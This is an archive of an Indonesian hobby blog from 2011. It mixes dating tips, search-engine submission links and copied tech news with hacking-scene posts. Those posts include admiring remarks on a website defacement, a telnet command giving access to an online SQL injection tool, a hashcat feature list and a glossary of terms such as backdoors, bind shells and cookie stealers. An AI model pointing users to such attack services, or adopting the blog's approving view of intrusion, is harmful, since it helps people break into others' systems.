Sabtu, 30 Juli 2011

Penyebab Seseorang Susah Dapat Pacar



Halo.. :)
kalo ini berjumpa lagi dengan saya iksandarkmission ^^
x ini saya mw share ni penyebab seseorang susah dapat pacar yg saya dapat dari keliling google..
Sudah Punya pacar kah teman2?yang pasti na uda ada la..
teman2 kan jago nyari pacar.. :))
mungkin topik x ini dibahas hanya sekedar untuk pengen tau apa2 aja penyebab seseorang susah dapat pacar..
Ok..langsung saja,ini dia penyebab nya..


1. Kurang Pergaulan alias kuper
Kuper, kurang pergaulan adalah penyebab utama kenapa seseorang sulit dapat pacar? Lingkup pergaulan dengan orang yang itu-itu saja membuatnya tidak berkembang, termasuk dalam urusan cinta. Mereka tidak punya banyak pilihan untuk bertemu dengan calon pacarnya.

2. Terlalu pemilih
Biasanya, orang-orang seperti ini menerapkan standar yang cukup tinggi mengenai kriteria cowok atau cewek yang bisa jadi pacarnya, yang diinginkannya. Bahkan tidak jarang terlalu tinggi dan tidak sesuai dengan dirinya. Tipe perfectionist, akibatnya sudah bisa ditebak. Susah dapat pacar..wew..jangan sampe' la terjadi ma teman2 ^^

3. Kurang Percaya Diri
Rasa kurang percaya diri (PD) bisa menyebabkan seseorang vakum dalam dunia percintaan. Susah dapat pacar adalah sesuatu yang biasa bagi orang-orang seperti ini. Bahkan bisa merembet ke dalam aspek kehidupan sosialnya.

4. Terlalu sibuk dengan pekerjaan
Kesibukan menjadi hal yang lumrah di zaman modern yang serba materialistis ini. Yang jadi masalah adalah seringkali seseorang terlalu sibuk bekerja, mengejar karir atau study sehingga mengesampingkan urusan mencari pasangan.

5. Terlalu pendiam dan pemalu
Sebagian orang, terutama cewek merasa bingung bagaimana cara menghadapi cowok pendiam apalagi pemalu. Meski pun ada sebagian orang yang kepincut dengan sosok pendiam dan cool (seperti Saya). Tapi secara keseluruhan sosok cowok pendiam ini agak susah dapat pacar.

6. Terlalu cuek dan nggak pengertian
Dalam menjalin sebuah hubungan, seseorang tentu ingin diperhatikan oleh pasangannya. Nggak percaya? Baca artikel saya mengenai tipe cewek yang disukai cowok dan tipe cowok yang disukai cewek. Dari situ terlihat jelas cewek dan cowok pengertian berada di urutan atas. Nah, kalau terlalu cuek, siapa yang mau..?

7. Sulit Mengungkapkan cinta
Sudah jelas kenapa tipe orang seperti ini susah dapat pacar. Sulit mengungkapkan cinta, bisa dibilang tidak berani mengungkapkan atau menunjukkan perasaan cinta terhadap orang yang dicintainya. Bagaimana dia tahu kamu mencintai dia kalau tidak diungkapkan..? Berharap mata berbicara..?

8. Menutup diri dan tertutup
Orang-orang yang membuka diri saja belum tentu bisa dapat pacar dengan mudah. Terlebih orang-orang yang menutup dirinya terhadap orang lain terutama lawan jenis. Mungkin orang-orang seperti ni terlalu misterius kalee, yah..?

9. Punya banyak kebiasaan buruk
Setiap orang tentu punya sisi buruk, sifat buruk atau kebiasaan buruk. Tapi, kalau terlalu banyak sisi negatifnya, tentu orang-orang akan berfikir ulang untuk menjalin hubungan dengan orang tersebut...

Just Share..

Jumat, 29 Juli 2011

Mendaftarkan Blog di Berbagai Seacrh Engine




Salah satu fungsi search engine bagi kita, pemilik blog adalah untuk memperkenalkan blog kita karena search engine akan membawa pengunjung ke blog kita :)

Untuk pengguna internet adalah mempermudah mencari informasi yang diinginkannya, bayangkan saja seandainya tidak ada search engine atau mesin pencari betapa sulitnya mencari informasi yang dikehendaki. Informasi banyak tapi sulit dicari, ibarat pepatah mencari jarum di tumpukan jerami.

Berapa banyak search engine yang kamu ketahui? Atau search engine apa yang sering orang gunakan? Ada banyak sekali penyedia jasa pencarian ini, ada 1000 lebih search engine. Dan search engine yang sering di gunakan dan paling terkenal di bumi ini adalah google dan diikuti oleh yahoo. Kedua search engine itu paling dikenal dan digunakan.

Langsung saja kita daftarkan blog kita ke berbagai search engine :D , supaya blog kita semakin ramai dikunjungi banyak orang, itukan yang kita harapkan? Kemana kita daftar? Oke, Ini Dia.. :)

Name : Google
Alamat URL : http://www.google.com
Alamat Pendaftaran : http://www.google.com/addurl.html

Name : Yahoo !!
Alamat URL : http://www.yahoo.com
Alamat Pendaftaran : http://submit.search.yahoo.com/

Name : MSN
Alamat URL : http://www.msn.com
Alamat Pendaftaran : http://search.msn.com.sg/docs/submit.aspx

Name : AltaVista
Alamat URL : http://www.altavista.com
Alamat Pendaftaran : http://add-url.altavista.com/cgi-bin/newurl?

Name : Lycos
Alamat URL : http://www.lycos.com
Alamat Pendaftaran : http://home.lycos.com/addasite.html

Name : All The Web
Alamat URL : http://www.alltheweb.com
Alamat Pendaftaran : http://www.alltheweb.com/add_url.php3

Name : Direct Hit
Alamat URL : http://www.directhit.com
Alamat Pendaftaran : http://www.directhit.com/util/addurl.html

Name : Excite
Alamat URL : http://www.excite.com
Alamat Pendaftaran : http://www.excite.com/info/add_url_form/

Name : Hotbot
Alamat URL : http://www.hotbot.com
Alamat Pendaftaran : http://hotbot.lycos.com/addurl.asp

Name : Northern Light
Alamat URL : http://www.northernlight.com
Alamat Pendaftaran : http://www.northernlight.com/docs/requrl_help.html

Name : Webtop
Alamat URL : http://www.webtop.com
Alamat Pendaftaran : http://www.webtop.com/search/vanilla/addurl.html

Name : Dmoz
Alamat URL : http://dmoz.org
Alamat Pendaftaran : http://dmoz.org/add.html

Name : Webcrawler
Alamat URL : http://www.webcrawler.com
Alamat Pendaftaran : http://www.webcrawler.com/info/add_url/

Name : InfoSeek
Alamat URL : http://www.infoseek.com
Alamat Pendaftaran : http://www.infoseek.com

Name : Open Text
Alamat URL : http://index.opentext.net
Alamat Pendaftaran : http://index.opentext.net

Name : Free Submit to 1500 Search Engines
Alamat URL : http://www.submitxtras.com/
Alamat Pendaftaran : http://www.submitxtras.com/

Semakin kamu sering atau rajin mendaftarkan blog kamu ke berbagai search engine, maka peluang blog kamu dikunjungi banyak orang yang terbawa dari search engine semakin besar :D
semoga bermanfaat :)

Kamis, 28 Juli 2011

Anonymous Hackers hit 50 Malaysian government websites
























Malaysia has been hit by a wave of attacks after the "Anonymous" hacker group accused the government of Internet censorship. More than 50 government websites were hit and 41 of them were closed

The Malaysian Communications and Multimedia Commission (MCMC) said in a statement the attacks on websites with the .gov.my domain started shortly before midnight Wednesday and lasted several hours.
Little damage was caused and these were denial of service attacks. Apparently most of the websites have already recovered.

Anonymous warned on a website that it would target the government portal www.Malaysia.gov.my on Wednesday. It was still down this morning.

It is interesting that it has just woken up to this problem. Malaysia's media operate under strict censorship laws. Until now websites have remained relatively free, due to an official pledge not to censor the Internet in a bit to get foreign cash into the country.

Selasa, 26 Juli 2011

Google Plus Blogger Template



yupzzz..
x ini saya mw share ni template google + yg ane dapet dari keliling google..


DEMO | DOWNLOAD

moga bermanfaat ^_^

Senin, 25 Juli 2011

Smadav.net Kena Hack


ternyata site smadav.net tembus juga di bwt omz hmei7 :)
salut dah liat umz yg satu ni..
berikut tampilannya..

Rabu, 20 Juli 2011

Online sql injection tool - access via telnet by Mywisdom











ni tools online ane copas dari blog om wisdom :))

enjoy :

telnet 49.0.6.219 3339


Senin, 18 Juli 2011

Hash Cracking with HASHCAT











Features


* Free
* Multi-Threaded
* Multi-Hash
* Linux & Windows native binaries
* Fastest cpu-based multihash cracker
* SSE2 accelerated
* All Attack-Modes except Brute-Force and Permutation can be extended by rules
* Very fast Rule-engine
* Rules mostly compatible with JTR and PasswordsPro
* Possible to resume or limit session
* Automatically recognizes recovered hashes from outfile at startup
* Can automatically generate random rules
* Load hashlist with more than 3 million hashes of any type at once
* Load saltlist from external file and then use them in a Brute-Force Attack variant
* Able to work in an distributed environment
* Specify multiple wordlists and also multiple directories of wordlists
* Number of threads can be configured
* Threads run on lowest priority
* 30+ Algorithms implemented with performance in mind
* ... and much more

---------------------------------------------------------------------------------------------


Attack-Modes

* Straight *
* Combination *
* Toggle-Case
* Brute-Force
* Permutation
* Table-Lookup

* accept Rules
----------------------------------------------------------------------------------------------
Algorithms

Hashcat ships with a decent number of hashing Algorithms built-in. All Algorithm have been implemented from scratch to run with an exceptional performance. To not loose sight, a unique feature of the GUI is a Hash Browser that lets you easily search for the right hashmode interactively, based on algo-class or application like WordPress, vBulletin or osCommerce.

* MD5
* md5($pass.$salt)
* md5($salt.$pass)
* md5(md5($pass))
* md5(md5(md5($pass)))
* md5(md5($pass).$salt)
* md5(md5($salt).$pass)
* md5($salt.md5($pass))
* md5($salt.$pass.$salt)
* md5(md5($salt).md5($pass))
* md5(md5($pass).md5($salt))
* md5($salt.md5($salt.$pass))
* md5($salt.md5($pass.$salt))
* md5($username.0.$pass)
* md5(strtoupper(md5($pass)))
* SHA1
* sha1($pass.$salt)
* sha1($salt.$pass)
* sha1(sha1($pass))
* sha1(sha1(sha1($pass)))
* sha1(strtolower($username).$pass)
* MySQL
* MySQL4.1/MySQL5
* MD5(Wordpress)
* MD5(phpBB3)
* MD5(Unix)
* SHA-1(Base64)
* SSHA-1(Base64)
* SHA-1(Django)
* MD4
* NTLM
* Domain Cached Credentials
* MD5(Chap)
* MSSQL
* SHA256
* MD5(APR)
* SHA512
* SHA-512(Unix)


Download HASHCAT



Situsnya Dibajak, Lady Gaga Lapor Polisi

Situs Lady Gaga (gambar: screen-shot)
Situs Lady Gaga (gambar: screen-shot)

LONDON - Bintang pop Lady Gaga memanggil polisi setelah situsnya dibajak hacker, yang mencuri ribuan nama dan alamat email di situs tersebut.

Seperti yang dikutip dari New Kerala, Minggu (17/7/2011), situs Inggris Lady Gaga dibajak oleh hacker Amerika Serikat (AS) bernama SwagSec. Hal ini membuat pihak label rekamannya membuat harus membuat tindakan lebih lanjut.

"Ia sangat sedih dan berharap agar pihak kepolisian bisa menyelidiki mengapa hal seperti ini bisa terjadi," ujar sebuah sumber.

Serangan hack tersebut sebenarnya sudah terjadi sejak tanggal 27 Juni, namun infomasinya baru diumumkan ke pihak publik pada pekan ini.

Hacker yang membajak situs tersebut juga mengancam Lady Gaga, dan menyebutnya sebagai seorang homofobik.

"Hacker tersebut mencuri konten database buangan dari situs www.ladygaga.co.uk dan juga sejumlah email. Meskipun begitu tidak ada password atau data keuangan yang tercuri," ujar juru bicara dari pihak label rekaman Universal.

Lalu sebuah sumber juga menyebutkan bahwa pihak berwenang kini sedang menyelidiki secara seksama kasus tersebut. "Semua pihak yang terkena serangan di situs tersebut akan diberi peringatan," ujarnya.

Selain itu, pihak SwagSec dikabarkan juga ingin menyerang situs dari artis label rekaman Universal lainnya seperti Amy Winehouse dan Justin Bieber.

sumber: http://techno.okezone.com/read/2011/07/17/55/480791/55/situsnya-dibajak-lady-gaga-lapor-polisi

AnonPlus, Jejaring Sosial Versi Hacker

Situs AnonPlus (gambar: screenshot)
Situs AnonPlus (gambar: screenshot)

CALIFORNIA - Google dilaporkan telah memblokir anggota kelompok hacker Anonymous dari situs jejaring sosial Google+. Atas pemblokiran tersebut, kelompok hacker tersebut malah membuat situs jejaring sosial versi mereka sendiri yang bernama AnonPlus.

Seperti yang dikutip dari TechSpot, Senin (18/7/2011), Situs yang beralamatkan di www.anonplus.com tersebut saat ini hanya baru diumumkan. Tertulis di situs tersebut 'Revision: 0.1 Alpha' yang menandakan bahwa situs tersebut masih dalam tahap awal pengembangan, belum menjadi situs jejaring sosial sepenuhnya. Yang baru ada di situs tersebut hanyalah tulisan 'Social Networking Anonymously' dan header yang bertuliskan 'Welcome to AnonPlus.com, the Anonymous Social Networking site'.

"Jejaring sosial ini tidak akan mentolerir tindakan pemblokiran, sensor, atau penindasan," tulis perwakilan pihak Anonymous dalam pernyataannya.

"Kami, masyarakat, telah jenuh atas pernyataan pemerintah dan korporat, yang mengatakan apa yang terbaik ataupun aman untuk kita. Era penindasan sudah berakhir. Internet bukan lagi sebuah penjara bagi kita," tambahnya.

Satu-satunya link yang ada di situs tersebut adalah Dev Forum, yang menggunakan software forum Zetaboards, dan tidak dibawah nama domain anonplus.com. Ada empat subforum di Zetaboards, yaitu The Logic, The Interface, General Chatter, dan Staff Positions. Di saat penulisan, tercatat sudah ada 100 anggota yang terdaftar di situs AnonPlus.

AnonPlus mungkin tidak akan mendorong penggunanya untuk membagikan nama serta lokasi mereka. Tujuan dibuatnya situs jejaring sosial oleh Anonymous mungkin agar pengguna bisa melakukan apapun yang mereka suka di sana.

Flash Player 11 Beta Sudah Dukung 3D

Flash Player 11 beta (gambar: techhew.com)
Flash Player 11 beta (gambar: techhew.com)

CALIFORNIA - Adobe telah meluncurkan versi beta dari Flash Player 11 dan AIR 3. Versi beta dekstop Flash Player 11 juga mencomot beberapa fitur dari Flash Player Incubator, seperti Stage 3D dan dukungan untuk 64-bit.

Kunci dari Flash Player 11 beta untuk dekstop sudah termasuk application programming interface (API) Stage3D, dukungan 64-bit untuk Mac OS X. Lalu sebagaimana Windows dan Linux, ada juga kemampuan untuk mengintegrasikan suara/telepon ke dalam aplikasi bisnis dengan menggunakan G.711 codec kompresi audio, serta meng-encode kualitas video menjadi lebih tinggi lagi dengan menggunakan H.264/AVC SW Encoding.

Sementara versi beta Adobe AIR 3 juga memperkenalkan fitur yang menyediakan ke pengembang sebuah peningkatan ekosistem untuk pengiriman keluar aplikasi browser di semua perangkat dan platform. Demikian seperti yang dikutip dari PC Advisor, Senin (18/7/2011).

AIR 3 beta menghantarkan sebuah inovasi dengan pengembangan kualitas rendering grafik, video definisi tinggi dan penggapaian konsisten di sepanjang sistem operasional dan perangkat. AIR 3 beta memiliki fokus khusus bagi mereka yang berminat dalam pengembangan kualitas game konsol, video definisi tinggi, dan lain-lain.

Periode waktu AIR 3 beta untuk dekstop disediakan agar bisa memastikan aplikasi sebelumnya AIR 2.7 dan versi yang lebih tua lagi agar bisa kompatibel dengan AIR 3 yang akan diluncurkan nanti.

Untuk Keamanan Browser, IE9 Juaranya

Ahmad Taufiqurrakhman - Okezone
Data statistik dari NASS Labs mengenai keamanan browser
Data statistik dari NASS Labs mengenai keamanan browser

CALIFORNIA - Sebuah penelitian terbaru yang dilakukan oleh NSS Labs menunjukkan bahwa Internet Explorer (IE) 9 dan Internet Explorer 8 menduduki posisi pertama dan kedua untuk urusan keamanan browser.

Seperti yang dikutip dari VR-Zone, Senin (18/7/2011), saat ini mayoritas pengguna meninggalkan browser IE dikarenakan alasan performanya yang lamban, tidak populer, ketinggalan jaman dan lain-lain. Namun penelitian terbaru dari dari NSS Lab, menunjukkan bahwa IE9 dan IE8 dengan telak mengalahkan browser lainnya macam Chrome, Firefox, Safari dan Opera, untuk urusan keamanan.

Menurut laporan yang diterbitkan oleh NASS Labs, Internet Explorer 9, melalui dua pendekatannya, secara aktif menyaring malware melalui kombinasi URL dan scan berbasis aplikasi, sehingga menghasilkan keamanan yang cukup baik.

Pihak NSS Labs juga mengklaim bahwa URL dari IE juga mampu mendeteksi sebanyak 92 persen ancaman, sementara proteksi tambahan yang ditawarkan oleh Application Reputation meningkatkan penyaringan hingga mencapai 100 persen. Selain itu, NSS Labs juga menemukan bahwa IE 8 juga cukup berhasil di uji coba tersebut, dengan mampu menghentikan ancaman hingga 90 persen.

Kebalikannya, Safari 5, Chrome 10 dan Firefox 4 semuanya berada di posisi ketiga, dengan angka tingkat perlindungan keamanan sebesar 13 persen. Sementara itu, browser Opera, hanya bisa memblokir sekira 5 persen ancaman internet yang ada.

NSS Labs juga mengklaim bahwa IE 9 berada di urutan pertama untuk kategori waktu yang dibutuhkan browser untuk memblokir situs yang mengandung malware.

Dengan hasil penelitian yang sudah dipaparkan oleh NSS Labs tersebut, sangat sulit untuk menyebut bahwa 'Internet Explorer tidak aman'.

Toshiba Luncurkan Dekstop TouchScreen

Toshiba DX1215 (gambar: regmedia.co.uk)

CALIFORNIA - Jika anda adalah penikmat teknologi kelas tinggi, maka saat ini akan ada satu teknologi terbaru diluncurkan oleh Toshiba, yaitu DX1215 yang merupakan dekstop layar sentuh.

Menurut laporan dari Engadget, disebutkan bahwa DX1215 akan menjadi layar sentuh terbesar yang pernah ada yaitu 21.5 inci yang terbuat dari bahan hitam glossy. Memiliki 2 port USB 3.0 yang menegaskan USB Sleep dan charge 5 serta 4 port USB 2.0, demikian yang dilansir OSM Kamis (23/6/2011).

Toshiba DX1215 menggunakan IntelCore i5 atau Core i7 prosesor2. Kapasitas penyimpanan multi media juga sangat besar yaitu 1 TB yang dapat menyimpan jutaan foto dan video kesayangan anda.

Perangkat ini juga memiliki port DVD. "Selain itu Port HDMI memungkinkan pengguna untuk menghubungkan konsol game favorit mereka ke dekstop ini secara langsung," terang pihak Toshiba.

Toshiba DX 1215 juga menghadirkan Onkyo speaker yang dirancang untuk memberikan suara yang jernih dan menggelegar. Tidak hanya itu, keybord dan mouse sudah menggunakan nirkabel bluetooth.

Harga jual DX1215 akan dibandrol sebesar USD929,99 yang akan bisa didapatkan secara online atau melalui Best Buy Stores pada tanggal 3 Juli 2011 mendatang.

sumber: http://techno.okezone.com/read/2011/06/22/324/471553/toshiba-luncurkan-dekstop-touchscreen

Jepang Ciptakan Komputer Tercepat di Dunia

Foto: AFP
Foto: AFP

TOKYO - Sebuah superkomputer Jepang telah merebut gelar mesin tercepat di dunia. Superkomputer K, yang dibuat perusahaan Fujitsu, mampu membuat 1 juta komputer desktop yang terhubung secara bersamaan. Karya ini sekaligus menggeser Tianhe-1A asal China yang sempat bertengger dalam enam bulan terakhir.

Superkomputer K memiliki kekuatan tiga kali lebih baik dari pemegang gelar seblumnya dan mampu melakukan delapan perhitungan quadrilliun setiap detiknya. quadrilliun merupakan suatu angka yang diikuti oleh 15 nol dan dalam jargon komputer kecepatan ini dikenal sebagai 8,2 petaflops.

Seperti yang dilansir MailOnline, (Kamis 23/6/2011), mesin tercepat sebelumnya adalah komputer China yang diberi nama 'Tianhe-1A', dengan 2,507 petaflops dan menyoroti munculnya kekuasaan China dibidang teknologi serta ekonomi. Mesin Tianhe-1A juga mengantarkan China kali pertama menduduki daftar kecepatan komputer dan bergelut memperebutkan gelar juara di Amerika Serikat (AS) yang memiliki empat dari sepuluh superkomputer ternama dunia.

Para ahli mengatakan, pengembangan mesin K, yang lebih cepat dari lima pesaing terdekatnya, menandai lompatan kemajuan besar Jepang dalam dunia teknologi. "Mesin ini sangat mengesankan dan jauh lebih kuat dari komputer lain," kata Profesor Jack Dongarra, yang mengumumkan daftar enam-bulanan superkomputer top dunia.

Peringkat kecepatan didasarkan dengan menjalankan persamaan matematis standar. Hal ini menunjukkan keunggulan Jepang untuk membuat komputer K. Dengan menghabiskan biaya USD1,2 miliar sebagai bukti kembalinya Jepang di posisi puncak teknologi komputer untuk kali pertama dalam tujuh tahun terakhir.

Dikembangkan di RIKEN Advanced Institut Komputasi Sains, Kobe, Jepang, raksasa komputer ditempatkan dalam struktur iklim yang dikendalikan, dalam ruangan seperti gudang. Terdiri dari 672 lemari yang penuh dengan papan sirkuit yang berisi hampir 70.000 prosesor. Superkomputer K menggunakan energi yang cukup untuk kekuatan 10.000 rumah. Penciptanya mengklaim mesin tersebut tetap hemat energi.

"Penggunaan komputer K diharapkan memiliki dampak yang inovatif di berbagai bidang, mulai dari penelitian iklim global, meteorologi, pencegahan bencana, dan obat-obatan. Sehingga berkontribusi terciptanya masyarakat yang sejahtera dan aman," kata seorang juru bicara lembaga RIKEN.

Ada lima superkomputer buatan AS yang menduduki peringkat 10 besar, termasuk sistem Jaguar di peringkat ketiga di Oak Ridge National Laboratory di Oak Ridge, Tennessee. Dari 10 peringkat besar tersebut di antaranya ada dua mesin dari China, dua dari Jepang dan satu dari Prancis


sumber: http://techno.okezone.com/read/2011/06/23/324/471851/jepang-ciptakan-komputer-tercepat-di-dunia

Intel Tantang Developer Indonesia

Intel
Intel

JAKARTA - Intel akan menantang para developer lokal untuk menciptakan suatu apllikasi di program Pengembang Intel AppUp. Ini bertujuan diadakan Intel untuk menciptakan peluang bagi para pengembang lokal untuk menyalurkan bakat mereka dalam mengembangkan aplikasi di beberapa perangkat, mengubah ide mereka menjadi kenyataan.

Kompetisi ini juga bertujuan untuk meningkatkan daya saing pribadi mereka dalam bisnis internet. Intel Software Partner dan Intel Software Network juga hadir untuk memberikan dukungan teknis dan dari sisi bisnis terbaik bagi vendor software individu.

"Kebutuhan dan kreatifitas lokal akan mendorong perekonomian internet berkembang lebih cepat. Ini merupakan kesempatan bagi para pengembang untuk masuk pada bursa dan ambil bagian dalam ekosistem App Global", kata Narendra Bhandari, Direktur Asia Pasifik Developer Relation Division Software and Service, Intel Corporation, seperti dilansir melalui keterangan resminya, Senin (18/7/2011).

"Inisiatif ini merupakan bagian dari komitmen Intel untuk memacu kreatifitas di antara para pengembang aplikasi berbakat dan menampilkan bakat mereka di dan ke luar Indonesia",tambahnya.

Kompetisi Intel developer Apps akan berlangsung dari 15 Juli-30 September, 2011 dan terbuka untuk siapa saja yang tertarik dalam pengembangan aplikasi. Setiap peserta dapat dengan mudah bergabung dengan mengakses http://appdeveloper.intel.com dan mendaftarkan karya aplikasi mereka.

Sepuluh aplikasi terbaik akan mendapatkan masing-masing USD500, sementara tiga aplikasi terbaik akan menerima USD 1,000


Sumber: http://techno.okezone.com/read/2011/07/18/324/481253/intel-tantang-developer-indonesia

Telkomsel Tap-Izy, Ubah Ponsel Jadi Dompet Digital

Ilustrasi
Ilustrasi

JAKARTA - Setelah sukses menggarap layanan T-Cash beberapa tahun lalu, Telkomsel kembali mengembangkan layanan mobile wallet milik mereka. Layanan yang dikenal dengan sebutan Tap-Izy ini dapat merubah ponsel Anda menjadi dompet digital.

Teknologi yang digunakan oleh Telkomsel ini sudah dilengkapi dengan radio frequency identification (RFID) sudah umum digunakan di sejumlah negara di Amerika, Eropa, dan Asia. Sehingga ketika pengguna melakukan aktifitas berbelanja, cukup dengan menempelkannya pada mesin EDC.

Chip RFID yang disimpan pada kartu SIM dapat merekam saldo dan mendukung pertukaran data. Saat ponsel berkartu SIM RFID menyentuh EDC, mesin akan membaca data yang terdapat di dalam chip. Selanjutnya, mesin akan mencatat data transaksi pembayaran dan mengeluarkan struk.

"Saldo dana yang tersimpan di kartu GSM itu sendiri berbeda dengan pulsa yang tersedia untuk berkomunikasi. Pembayaran menggunakan Tap-Izy tidak memotong pulsa seluler di kartu SIM yang bersangkutan," terang Bambang Supriyogo, Vice President T-cash Management Telkomsel.

Kartu SIM khusus yang memiliki chip RFID itu bisa didapatkan di Grapari dan gerai Indomaret serta 7-Eleven bertanda Tap-Izy. Pengguna Telkomsel prabayar dan pascabayar bisa menukar kartu SIM mereka dengan kartu Tap-Izy namun tetap bisa menggunakan nomor seluler yang sama.

Setelah kartu diaktifkan, pengguna bisa mengisi “dompet” itu dengan nominal Rp25 ribu hingga Rp1 juta di Grapari serta Indomaret atau lewat T-Cash. Setelah kartu seluler diisi, saldo yang ada bisa digunakan untuk transaksi pembayaran di mitra-mitra Tap-Izy di Jabodetabek, dan ke depannya di seluruh Indonesia.

Selain berbelanja di minimarket, Tap-Izy juga bisa digunakan membayar tiket kereta Jabodetabek kelas ekonomi.


Sumber: http://techno.okezone.com/read/2011/07/07/54/477148/telkomsel-tap-izy-ubah-ponsel-jadi-dompet-digital

Jelang Ramadhan, Axis Tambah Jaringan di 1.170 Site





JAKARTA - Peningkatan trafik voice, SMS maupun data yang terjadi setiap Ramadhan dan Idul Fitri selalu menjadi perhatian seluruh operator telekomunikasi setiap tahun. Tidak terkecuali dengan Axis.

Salah satu masalah yang harus diantisipasi Axis, serta operator lainnya, tentu adalah perpindahan trafik dari kota ke daerah disebabkan arus mudik. Untuk mengantisipasi hal ini, Axis telah melakukan upgrade atau penambahan kapasitas jaringan pada sekira 1.170 site yang tersebar di seluruh pulau Jawa.

"Sejak tiga bulan lalu kami sudah melakukan persiapan untuk upgrade kapasitas Trx (transmission unit) sehingga diharapkan pelanggan tidak akan kesulitan berkomunikasi dengan siapapun," jelas Dadan Rahmat selaku Radio Network Planning Manager Axis wilayah Jawa Tengah, Kamis (14/7/2011).

"Untuk saat ini penambahan kapasitas itu memang masih terbatas di wilayah Jawa, tapi ke depannya tentu kami akan melakukan di lebih banyak site," tambah Dadan.

Jumlah Trx yang ditambah setiap site, menurut Dadan, tidak bisa dipukul rata. "Kami melakukan penambahan sesuai kebutuhan masing-masing wilayah dan berdasarkan tren pelanggan dari tahun sebelumnya," jelasnya.

Selain menambah kapasitas Trx untuk voice dan SMS, Axis juga menambah jumlah channel untuk layanan data di setiap site. Pasalnya, merujuk pada 'tradisi' mudik yang kerap diasosiasikan dengan macet, seringkali trafik justru datang dari jalan, bukannya daerah mudik yang dituju.

"Biasanya kalau mudik bisa terjebak macet sampai beerjam-jam. Kalau sudah begitu biasanya salah satu kegemaran pelanggan adalah mengakses situs-situs jejaring sosial," ujar Dadan lagi.

Network Performance Officer Adrian Sumbara menambahkan pihaknya juga semakin mengintensifkan drive test atau uji jaringan di jalur-jalur mudik agar bisa mengantisipasi apa saja kebutuhan pelanggan.

"Kami memang biasa melakukan drive test ini satu kali setiap bulannya. Tapi jelang Ramadhan pelaksanaannya tentu lebih intensif," paparnya.

"Lagipula kami juga harus melaporkan uji jaringan ke Ditjen Postel, dimana setiap operator harus memenuhi kuota tertentu. Kalau tidak bisa memenuhi itu kami bisa dikenakan penalti," tutupnya.


Sumber: http://techno.okezone.com/read/2011/07/14/54/479824/jelang-ramadhan-axis-tambah-jaringan-di-1-170-site

April 2014, Windows XP Tamat!!!








CALIFORNIA - Meski sempat mengklaim akan memperpanjang ‘nyawa’ Windows XP hingga 2020, Microsoft kini semakin gencar mengimbau para penggunanya untuk beralih ke Windows 7. Pasalnya, versi OS ini akan benar-benar ‘tutup usia’ pada April 2014 mendatang.

Community Manager untuk Windows Stephen Rose mengatakan banyak penyedia software pihak ketiga yang enggan memperpanjang dukungan untuk aplikasi mereka di Windows XP. Artinya, risiko dan kompleksitas yang dihadapi pengguna XP semakin besar. Perusahaan yang masih menggunakan OS ini juga harus merogoh kocek lebih dalam untuk biaya manajemen.

Selain menghilangkan semua update keamanan untuk XP, Microsoft juga berupaya mengarahkan penggunanya meninggalkan XP melalui browser anyar Internet Explorer 9 yang tidak mendukung OS tersebut. IE9 bisa berjalan di versi Vista maupun Windows 7. Demikian seperti dilansir
Yahoo News, Rabu (13/7/2011).

Tentu saja, kegigihan Microsoft mengajak penggunanya meninggalkan XP dikarenakan kehadiran versi Windows 7, yang kini disinyalir telah digunakan oleh 27 persen PC. Bahkan, Microsoft diperkirakan bakal meluncur OS teranyarnya, Windows 8, tahun depan. Menurut Rose, Windows 7 kini sudah diadopsi oleh beberapa perusahaan besar termasuk Boeing, Dell, Samsung dan BMW.

Kendati begitu, berdasarkan data Net Applications, pengguna XP masih sangat banyak. Saat ini XP masih digunakan oleh 51 persen seluruh PC di dunia. Beberapa analis juga memperkirakan bahwa XP mewakili sekira 60 persen komputer perusahaan.

Sementara, firma riset Gartner mensinyalir bahwa lebih dari 50 persen organisasi yang tidak mulai mengadopsi Windows 7 di awal 2012 nanti tidak akan menyelesaikan prose situ hingga dukungan untuk XP benar-benar berakhir. Mereka tampaknya cukup rela mengeluarkan biaya tambahan untuk mempertahankan Windows XP.

Analis untuk Information Technology Intelligence Corp Laura DiDio mengingatkan Microsoft untuk tidak memaksakan pengguna XP hijrah ke OS baru itu sebelum benar-benar siap. Menurutnya, "Divisi IT di berbagai perusahaan cukup risau dengan permasalahan yang dihadapi XP, namun selama OS itu masih berjalan, mereka toh cukup puas."

Sebagian pengguna lainnya, menurut DiDio, akan menunggu hingga 2014, atau bahkan hingga peluncuran Windows 8 tahun depan, sebelum akhirnya meng-upgrade sistem operasi komputer mereka


Sumber: http://techno.okezone.com/read/2011/07/13/325/479248/april-2014-windows-xp-tamat

Jumat, 08 Juli 2011

HackPedia













Hacker
Sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer

Back connect
Mendapatkan koneksi balik atau mengkonek-kan kompi korban ke kompi kita.

Bind
Membuka port pada kompi korban. Biasanya untuk tujuan backdooring. Bind umumnya disertai service2 yg langsung mengakses shell.

Backdoor
Pintu belakang untuk masuk ke sistem yg telah berhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu.

Bug
Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

Cookie
Sejumlah kecil data, yang sering kali berisi pengenal unik anonim, yang dikirimkan kepada browser Anda dari komputer situs web dan disimpan pada hard drive komputer Anda.

Cookie stealer
Tehnik yang digunakan untuk mengambil atau mencuri cookie

DOS (denial-of-service attacks)
Jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

DDOS (Distributed Denial of Service)
Salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang "dipaksa" menjadi zombie) untuk menyerang satu buah host target di jaringan.

Crack
Program kecil yang biasanya digunakan untuk mengakali perlindungan anti pembajakan dari sebuah piranti lunak berlisensi. Biasanya para pembajak menyertakan crack dalam paket piranti lunak yang mereka distribusikan.

Debug
Kegiatan mencari bug pada aplikasi dan memperbaiki bug yg di temukan.

Dork
Perintah tersembunyi dari google atau keyword yang digunakan hacker untuk mencari target ( webshit , email dll )

Exploit
Memanfaatkan bugs yg ditemukan untuk masuk kedalam sistem.

Fake Login
